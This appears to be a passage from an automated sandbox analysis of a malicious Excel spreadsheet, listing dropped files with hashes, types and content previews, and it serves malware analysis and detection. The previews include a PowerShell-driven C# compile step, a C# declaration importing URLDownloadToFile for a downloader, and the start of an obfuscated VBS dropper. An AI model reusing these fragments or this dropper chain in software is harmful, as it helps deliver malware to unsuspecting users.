                                                                                                                                                                                  SHA-512:82188759F3F730366A27C5759DD46D40AD29D66E541629F9EC7C466976D272A91A9D9B13DFFFF14F29AE16BAED2C24EE382149712D7C2DEDF485AD72E3C02EC4
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.0.cs"

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.dll

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3072
                                                                                                                                                                                  Entropy (8bit):2.8757328258497203
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:etGSypuYYNdl8sJlvukUof26h6jmOzR3tkZfizLtFWI+ycuZhNqHakSjQPNnq:65Y4+SlAoe6hVFJizLm1ulqHa3jIq
                                                                                                                                                                                  MD5:F3816D0F84E5ED16AB08BF36C2DEF007
                                                                                                                                                                                  SHA1:5A0120D82837CB168A0E51D828BBF8E60D17B3E2
                                                                                                                                                                                  SHA-256:876154F80D034A74D6C0110EAE69C84B0BA9E7FBF1037738845E7A9C698FE556
                                                                                                                                                                                  SHA-512:51BA7CADFBFBE66F3F34CDDBC37B8B4C997DBCAFC297DD084E892C198D9600487D80ED4D97D4A5392E7992301EE52DF713528401FBFC3CE1CD3CE0AFB0E33E70
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Og...........!.................#... ...@....... ....................................@.................................l#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......,...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................:.3.......................................#.............. A.....P ......S.........Y.....e.....j.....r.....}...S.....S...!.S.....S.......!.....*.......A.......................................*..........<Module>.si

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.out

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):866
                                                                                                                                                                                  Entropy (8bit):5.3100451742052694
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:AId3ka6Kzi8Eoi+UKaMD5DqBVKVrdFAMBJTH:Akka60NEo8KdDcVKdBJj
                                                                                                                                                                                  MD5:9C9C71479D9EABF82084275F20F065EE
                                                                                                                                                                                  SHA1:4351D4BF6A3EB4A97636F750D75FF5FE895DDC05
                                                                                                                                                                                  SHA-256:15D612F9C75D3815AB2339432CA849478ACB37FA8EB7D11630E68E5FACC41C34
                                                                                                                                                                                  SHA-512:FE83022058056A0A91066F5728DBA9F6855A21A20EA9B5977565AF9EBBF59226D5DEEFF79E6A098CF0823CD7F90E3D13CC233774D3DF795B6A7DC617B72CFE19
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\tc3erle0\CSCE42B52D3958749FFBAC69A71E4122F1.TMP

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):652
                                                                                                                                                                                  Entropy (8bit):3.0674982000905775
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryNOak7YnqqOPPN5Dlq5J:+RI+ycuZhNnOakSOPPNnqX
                                                                                                                                                                                  MD5:6AFB3EE969CA9EA09DB543272B1826C5
                                                                                                                                                                                  SHA1:ED60D2C0585EAB56F8C8B9AB0F6FE24EF3439F1B
                                                                                                                                                                                  SHA-256:CF718D5F27FC668E12D12092F9076BA5BE0C1680419E1DCA43B123E5898BE1A1
                                                                                                                                                                                  SHA-512:76E7BBAECAFAF07D038F1863BC7777ACF97F3D4ADBC10AAA5298437225885490DC486DA4ABB2F7E7ECD287D16A9543697F25BB9EC19D94EF68BE60843CB193AA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.c.3.e.r.l.e.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.c.3.e.r.l.e.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.0.cs

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (367)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):488
                                                                                                                                                                                  Entropy (8bit):3.9754005389217877
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:V/DsYLDS81zuAi04tNkmMGlhbQXReKJ8SRHy4H/aQm4bV51j/As1W9y:V/DTLDfuAiJPt2XfHraQxp3Msk9y
                                                                                                                                                                                  MD5:3B52E3D1532B0BEB731C47FE5CF04437
                                                                                                                                                                                  SHA1:7135F88114807B36BE4B96E49E2ED21C1C2E48E1
                                                                                                                                                                                  SHA-256:D89D61099F569F77396FEFCDA11858CDC45FECC437AFA5204B654A63C0393AD8
                                                                                                                                                                                  SHA-512:D49EEB4817FD128B9C27930CC82388D17678684C56B9A92AA3F52154485CA0ED2E168849F9E7FC1815ADCA53B0AD57F525464087B4C3D9E14D02423D8939F8F2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace KqzGjT.{. public class ZxzNKYoGJwP. {. [DllImport("urLMOn.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr GjhMmMvqGKG,string lhSK,string CQBAeZT,uint ICEcRdeIUx,IntPtr pzxxzpmI);.. }..}.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.cmdline

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):369
                                                                                                                                                                                  Entropy (8bit):5.158374416388388
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fHRGQGzxs7+AEszIP23fHRGQV9:p37Lvkmb6KzPgvWZEoPgA9
                                                                                                                                                                                  MD5:62CA38958475F2ED57C68F90EFE30FBB
                                                                                                                                                                                  SHA1:96DF0A4846E6BCC17F2AF829F83687096414506A
                                                                                                                                                                                  SHA-256:18A41695DE3057D20CDE2F951E3BB34D8C4484197E4799F750CB5A184B4E855B
                                                                                                                                                                                  SHA-512:6E727505F38A1640410261D8850DBCF6C085DA7CF930B44F9F053D249CA645AFFC8217F24154FAF21B5A0D44EBB227F8921941BA49BD3F73044EFEF0A204D63A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.0.cs"

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.dll

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3072
                                                                                                                                                                                  Entropy (8bit):2.865917331229087
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:etGSkpuYYNdl8sJlvukUof26h66wmOzR3tkZf/eh0LtFWI+ycuZhNnOakSOPPNnq:6LY4+SlAoe6hXFJ/E0Lm1ulOa3qq
                                                                                                                                                                                  MD5:18B23C34A39911FA732807D3673FC8BC
                                                                                                                                                                                  SHA1:21A57017F8985C24949759282A7DF165D3607418
                                                                                                                                                                                  SHA-256:9762F61E18080FE47610E2365D1103E509002B7B3160FCACBD86B29AE40112B4
                                                                                                                                                                                  SHA-512:5716D71659FCE6727AE4E7D3A581F01C7070E1F5FAAA1CA7B4A660A50F3C141A5DE3DAB61CF414547F4ED8A6601028539444ED611BC36A5B7DC35DBCEF77DC0F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#.Og...........!.................#... ...@....... ....................................@.................................l#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......,...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................:.3.......................................#.............. A.....P ......S.........Y.....e.....j.....r.....}...S.....S...!.S.....S.......!.....*.......A.......................................*..........<Module>.tc

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.out

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):866
                                                                                                                                                                                  Entropy (8bit):5.300052825143811
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:AId3ka6Kz1Eo0KaMD5DqBVKVrdFAMBJTH:Akka601Eo0KdDcVKdBJj
                                                                                                                                                                                  MD5:441607F44CEB70BB3C61A9AA217B0C4B
                                                                                                                                                                                  SHA1:B3B286732690CA7AD37E350C481BE074930BE1A1
                                                                                                                                                                                  SHA-256:DC76FA8F3B635BCC9E442B06C685AE11B2FB24A2139DC3E36C7F8E92E6D430D3
                                                                                                                                                                                  SHA-512:EF7FBA3FCC9E69A1355F06FA27067C3E4F0F52EA4CE1C2B19FBB936E52F5A3F02126D4FBBF03139F6A1E5B37C879797EE6E718806778D55AFDBFA5929ADB40B8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\tozq

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\wma5vyw1.4zt.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\wpumvxik.ase.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF7DEE205FD35FA935.TMP

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFA87E4B783C92CD6C.TMP

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFF8FC2740F51B095D.TMP

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (3200), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):153968
                                                                                                                                                                                  Entropy (8bit):3.790314730405568
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:tx65fliEYTNokaahkpx65fliEYTNokaahvpx65fliEYTNokaah+:tAHGNAiCAHGNAiRAHGNAi+
                                                                                                                                                                                  MD5:23F2631CE99480A209B12A8F520D5480
                                                                                                                                                                                  SHA1:1F6CB113C9A2FF37CE5047B25EE7F432A4DBC950
                                                                                                                                                                                  SHA-256:4F1B501AD9C6CFEDAC6521C680F30D4FDBFDBD86C2742755D07F67C4939F0235
                                                                                                                                                                                  SHA-512:D906B932E7D6C8BD87D47E7D52E2CAF0AE05231E02BA720D8F81D9A90F5A2688773EC80CA91775B8753812FD638D2D123564489DA066A4C423DD76EB7F5CCAAE
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:...... . . . .....c.b.u.s.j.O.L.Z.c.m.W.J.G.a.f. .=. .".i.L.Z.L.U.h.n.U.k.U.L.U.L.W.o.".....o.i.t.K.U.W.i.I.G.L.K.i.S.K.a. .=. .".K.i.L.d.N.L.m.c.K.L.j.L.a.q.A.".....h.d.a.L.O.L.L.A.a.L.P.p.k.L.i. .=. .".W.o.K.i.x.K.L.Z.u.m.t.A.d.z.b.".........c.L.c.P.G.P.L.B.B.L.L.W.z.p.B. .=. .".t.g.u.b.W.K.t.A.z.h.n.R.l.p.v.".....t.f.O.h.l.Z.c.i.B.z.n.n.Z.l.G. .=. .".x.i.e.f.W.s.p.L.e.L.G.L.G.o.n.".....Z.K.K.z.O.N.e.U.i.e.P.I.O.k.r. .=. .".H.k.n.p.q.u.W.L.G.i.T.L.t.o.d.".....B.d.k.d.O.K.Z.A.v.P.K.z.N.u.U. .=. .".q.L.R.G.P.l.u.G.P.k.L.f.W.c.o.".....K.L.x.W.L.k.s.f.G.t.G.l.U.l.f. .=. .".L.f.A.u.b.N.L.W.B.N.o.L.L.m.Z.".....W.t.i.A.U.L.K.W.Q.x.h.W.c.z.q. .=. .".v.I.k.J.L.A.W.x.Z.z.K.c.f.u.i.".....p.i.B.e.K.O.x.G.m.U.U.i.W.B.v. .=. .".U.m.p.Z.c.c.L.q.W.L.r.K.L.a.K.".....x.H.L.N.f.u.n.W.G.b.o.H.l.W.i. .=. .".A.W.Q.C.N.L.B.m.Z.f.W.N.H.x.j.".....v.q.B.G.l.m.u.H.h.K.g.a.L.J.L. .=. .".x.g.k.S.P.R.e.O.U.h.L.o.U.e.K.".....a.b.U.z.L.L.Z.i.v.i.d.W.W.G.o. .=. .".C.j.S.A.z.G.L.C.c.p.R.G.L.L.W.".....c.K.G.C.R.L.i.I.

                                                                                                                                                                                  C:\Users\user\Desktop\0200011080.xls (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Dec 3 13:01:13 2024, Security: 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):988160
                                                                                                                                                                                  Entropy (8bit):7.7587349199950895
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:9SmzHJEUiOIBUzMTSnD3DERnLRmF8DhEPSxpsAQx1Zj+jTEPIrVQWvVk8B3uTVet:3Ba2bARM8A88Z+jyIrq8B3uQ3tJI0X
                                                                                                                                                                                  MD5:303CEC408CD730A7F55F5D2CD92B6B46
                                                                                                                                                                                  SHA1:E3AF855994FB94348A2241D0DDD55475B7EBBA72
                                                                                                                                                                                  SHA-256:D0214DD3F04DE57FC1A1835E3E4F0624F3DC2C876800F190E96E5D94EDE69BD6
                                                                                                                                                                                  SHA-512:7F99DEA49AC91BBE416136F0E0E5FD96A4E88E89BF6BD699E88BCAA8334DE577233FEEB3FFC8DDDA2A1B631D5F6E25DC06A1D96E1CE2CDCDE185B222057D2649
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:......................>.......................................................................5...6...7...............g.......i.......k...............................................................................................................................................................................................................................................................................................................................................................................................4...B............................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                  C:\Users\user\Desktop\CC430000

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Dec 3 13:01:13 2024, Security: 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):988160
                                                                                                                                                                                  Entropy (8bit):7.7587349199950895
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:9SmzHJEUiOIBUzMTSnD3DERnLRmF8DhEPSxpsAQx1Zj+jTEPIrVQWvVk8B3uTVet:3Ba2bARM8A88Z+jyIrq8B3uQ3tJI0X
                                                                                                                                                                                  MD5:303CEC408CD730A7F55F5D2CD92B6B46
                                                                                                                                                                                  SHA1:E3AF855994FB94348A2241D0DDD55475B7EBBA72
                                                                                                                                                                                  SHA-256:D0214DD3F04DE57FC1A1835E3E4F0624F3DC2C876800F190E96E5D94EDE69BD6
                                                                                                                                                                                  SHA-512:7F99DEA49AC91BBE416136F0E0E5FD96A4E88E89BF6BD699E88BCAA8334DE577233FEEB3FFC8DDDA2A1B631D5F6E25DC06A1D96E1CE2CDCDE185B222057D2649
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:......................>.......................................................................5...6...7...............g.......i.......k...............................................................................................................................................................................................................................................................................................................................................................................................4...B............................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                  C:\Users\user\Desktop\CC430000:Zone.Identifier

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                  Static File Info

                                                                                                                                                                                  General

                                                                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Dec 3 10:44:25 2024, Security: 1
                                                                                                                                                                                  Entropy (8bit):7.740151525019643
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                                                                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                                                                  File name:0200011080.xls
                                                                                                                                                                                  File size:997'376 bytes
                                                                                                                                                                                  MD5:bd6ddad63fc3c23331d2a7fd5ee23c06
                                                                                                                                                                                  SHA1:49faa91ee8dd7d5e4484291afa6e1e5bbd0c5b08
                                                                                                                                                                                  SHA256:6442a471211f88890f7d98021a2b478a872e1f5e6053a1f52fbd65da97755fbb
